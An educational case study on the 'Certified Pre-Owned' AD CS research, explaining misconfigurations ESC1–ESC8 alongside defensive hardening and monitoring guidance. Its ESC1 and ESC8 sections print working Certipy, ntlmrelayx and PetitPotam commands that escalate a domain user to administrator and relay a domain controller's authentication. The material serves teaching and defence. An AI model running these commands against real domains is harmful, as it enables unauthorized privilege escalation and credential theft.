Case Study 2: AD Certificate Services "Certified Pre-Owned"

The SpecterOps Research That Exposed a Massive AD Attack Surface

Overview

In June 2021, Will Schroeder and Lee Christensen of SpecterOps published "Certified Pre-Owned: Abusing Active Directory Certificate Services," a groundbreaking whitepaper that exposed Active Directory Certificate Services (AD CS) as one of the most significant and overlooked attack surfaces in enterprise Active Directory environments. Their research identified eight categories of misconfigurations (ESC1 through ESC8) and three persistence techniques that allowed attackers to escalate privileges, move laterally, and maintain persistent access through certificate-based attacks. The paper fundamentally changed how the security community views PKI infrastructure in AD environments.

Background: AD CS in Enterprise Environments

Active Directory Certificate Services provides Public Key Infrastructure (PKI) for AD environments. It issues X.509 certificates used for:

  • Smart card authentication for users and administrators
  • SSL/TLS certificates for internal web services
  • Code signing for internal applications
  • Email encryption (S/MIME)
  • Network authentication (802.1X)
  • VPN authentication

AD CS is deeply integrated with Active Directory. When a certificate is issued for authentication, it effectively becomes an alternative credential---a long-lived, password-independent way to prove identity. This is precisely what makes it so dangerous when misconfigured.

Before the "Certified Pre-Owned" research, AD CS was largely ignored during penetration tests. Security assessments focused on Kerberos, NTLM, delegation, and GPO misconfigurations. Certificate services were treated as a "set and forget" component of AD infrastructure.

The ESC Vulnerabilities

ESC1: Misconfigured Certificate Templates (Most Common, Most Dangerous)

The Misconfiguration: A certificate template that simultaneously meets four conditions: 1. Allows the enrollee to supply their own Subject Alternative Name (SAN) 2. Includes an Extended Key Usage (EKU) that enables client authentication 3. Grants enrollment rights to low-privileged users (Domain Users, Authenticated Users) 4. Does not require manager approval

Why It Matters: An attacker with standard domain user access can request a certificate and specify any user (including Domain Admin) as the Subject Alternative Name. The resulting certificate authenticates the attacker as the specified user, bypassing all password-based controls.

The MedSecure Finding: During the MedSecure engagement, Certipy enumeration revealed a template called "MedSecureWebAuth" that was vulnerable to ESC1:

$ certipy find -u j.smith@medsecure.local -p Password123 -dc-ip 10.10.10.1 -vulnerable

Certificate Templates
  Template Name: MedSecureWebAuth
  Display Name: MedSecure Web Authentication
  Enrollee Supplies Subject: True          # <-- ESC1 trigger
  Client Authentication: True              # <-- Enables authentication
  Enrollment Rights:
    MEDSECURE\Domain Users                 # <-- Low-priv can enroll
  Requires Manager Approval: False         # <-- No approval needed
  [!] VULNERABLE TO ESC1

The exploitation was straightforward:

$ certipy req -u j.smith@medsecure.local -p Password123 \
  -ca medsecure-DC01-CA -template MedSecureWebAuth \
  -upn administrator@medsecure.local

[*] Successfully requested certificate
[*] Saved certificate and key to 'administrator.pfx'

$ certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1
[*] Got hash for 'administrator@medsecure.local':
    aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42

From standard domain user to Domain Administrator hash in two commands.

ESC2: Any Purpose or SubCA EKU

Templates with "Any Purpose" or no EKU specified can be used for client authentication, even if that was not the intended purpose. Less common than ESC1 but equally dangerous when present.

ESC3: Certificate Request Agent

If an enrollment agent template is enrollable by low-privileged users, the agent certificate can request certificates on behalf of any user. This is a two-step attack: first enroll as an agent, then request certificates impersonating other users.

ESC4: Vulnerable Template ACLs

If a non-privileged user has write access to a certificate template's AD object (GenericAll, GenericWrite, WriteDacl, WriteProperty), they can modify the template to become vulnerable to ESC1, then exploit it.

ESC5: Vulnerable PKI Object ACLs

Broader than ESC4, this covers write access to PKI objects beyond templates: CA objects, the NTAuthCertificates object, and the Cert Publishers container.

ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2

If the CA server has the EDITF_ATTRIBUTESUBJECTALTNAME2 flag enabled, any certificate request can include an arbitrary SAN regardless of the template's configuration. This effectively makes every template vulnerable to ESC1-style attacks.

ESC7: Vulnerable CA ACLs

If a non-privileged user has ManageCA or ManageCertificates permissions on the CA itself, they can: - Enable EDITF_ATTRIBUTESUBJECTALTNAME2 (creating ESC6) - Approve their own certificate requests (bypassing manager approval requirements)

ESC8: NTLM Relay to AD CS HTTP Endpoints

If the CA has an HTTP enrollment endpoint (Certificate Enrollment Web Service) without Extended Protection for Authentication (EPA), NTLM authentication can be relayed to it. Combined with authentication coercion (PetitPotam), this allows obtaining certificates for domain controllers without any credentials.

# ESC8 Attack Chain:
# 1. Set up NTLM relay to the CA's HTTP endpoint
$ python3 ntlmrelayx.py -t http://ca.medsecure.local/certsrv/certfnsh.asp \
  -smb2support --adcs --template DomainController

# 2. Coerce DC01 to authenticate to us
$ python3 PetitPotam.py attacker-ip dc01.medsecure.local

# 3. DC01 authenticates, we relay to the CA
# 4. We receive a certificate for DC01$
# 5. Use the certificate to authenticate as DC01$

$ certipy auth -pfx dc01.pfx -dc-ip 10.10.10.1
# Result: DC01$ machine account hash -> DCSync

This attack requires zero credentials---only network access.

The Scope of the Problem

SpecterOps' research found that vulnerable AD CS configurations were pervasive:

  • Certipy/Certify scans of real-world environments consistently found ESC1 or ESC6 vulnerabilities in a majority of AD environments
  • Default template configurations in some Windows Server versions were vulnerable out of the box
  • Legacy templates from older AD deployments were frequently misconfigured
  • No awareness: Most IT teams had never audited their certificate templates for security

Certificate-Based Persistence

Beyond privilege escalation, certificates provide powerful persistence:

  1. Long Validity: Certificates are typically valid for 1-2 years, far longer than password rotation cycles.
  2. Survive Password Resets: A certificate remains valid even if the user's password is changed.
  3. Independent of Password Policy: Certificate authentication bypasses password lockout, complexity, and expiration policies.
  4. Difficult to Revoke: Most organizations lack the monitoring to detect malicious certificate usage, and revocation requires proactive identification.

Industry Impact

The "Certified Pre-Owned" research had a massive impact:

  1. New Attack Surface Recognition: AD CS moved from "not relevant" to "critical" in penetration test scopes.
  2. Tooling Development: Certipy (Python), Certify (C#), and ForgeCert emerged as standard AD CS assessment tools.
  3. Vendor Response: Microsoft published guidance on securing AD CS and began updating default template configurations.
  4. Certification Updates: OSCP, PNPT, and other certifications added AD CS content.
  5. Purple Team Exercises: Organizations began including AD CS in their threat modeling and red/purple team exercises.

🔵 Blue Team Perspective

Immediate Actions

  1. Audit All Certificate Templates: ```powershell # Using Certify (defensive mode) Certify.exe find /vulnerable

# Using Certipy certipy find -u admin@domain -p pass -dc-ip DC_IP -vulnerable ```

  1. Fix ESC1: Disable ENROLLEE_SUPPLIES_SUBJECT on all templates unless explicitly required. If required, restrict enrollment to specific high-privilege groups with manager approval.

  2. Fix ESC6: Disable EDITF_ATTRIBUTESUBJECTALTNAME2 on all CAs: powershell certutil -config "CA\CAName" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2

  3. Fix ESC8: Enable Extended Protection for Authentication (EPA) on all AD CS HTTP endpoints. Better yet, disable HTTP enrollment entirely if not needed.

  4. Restrict Enrollment Rights: Review every template and restrict enrollment to only the groups that genuinely need them.

Ongoing Monitoring

  • Monitor certificate enrollment events: Event ID 4886 (Certificate Services received a certificate request) and Event ID 4887 (Certificate Services approved a certificate request)
  • Alert on certificates issued with SANs that do not match the requesting user
  • Monitor for certificate-based authentication from unexpected users or systems
  • Track certificate template modifications
  • Deploy PKI monitoring solutions

AD CS Hardening Checklist

Control Priority
Audit all templates for ESC1-ESC8 Critical
Disable ENROLLEE_SUPPLIES_SUBJECT where not needed Critical
Disable EDITF_ATTRIBUTESUBJECTALTNAME2 Critical
Enable EPA on HTTP enrollment endpoints Critical
Restrict enrollment rights to minimum necessary High
Enable manager approval on sensitive templates High
Monitor certificate enrollment logs High
Regular template ACL audits Medium
Rotate CA certificates on schedule Medium

Discussion Questions

  1. Why was AD CS security overlooked for so long despite being a critical component of enterprise authentication?
  2. The ESC8 attack (NTLM relay to AD CS) requires zero credentials. How does this change the threat model for AD environments?
  3. How should organizations balance the operational needs of certificate-based authentication with the security risks exposed by this research?
  4. What does the "Certified Pre-Owned" research suggest about the likely existence of other large, unexamined attack surfaces in enterprise infrastructure?
  5. Given that certificates survive password resets, how should incident response procedures change when certificate-based compromise is suspected?

References

  • Will Schroeder and Lee Christensen: "Certified Pre-Owned: Abusing Active Directory Certificate Services" (SpecterOps, 2021)
  • Certipy GitHub Repository: https://github.com/ly4k/Certipy
  • Certify GitHub Repository: https://github.com/GhostPack/Certify
  • Microsoft: "Securing Active Directory Certificate Services"
  • Oliver Lyak: "Certipy 2.0 - BloodHound, New Escalations, Shadow Credentials, Golden Certificates, and more!"
  • SpecterOps Blog: Multiple posts on AD CS attack research
  • CISA Advisory: "Mitigating AD CS Misconfigurations"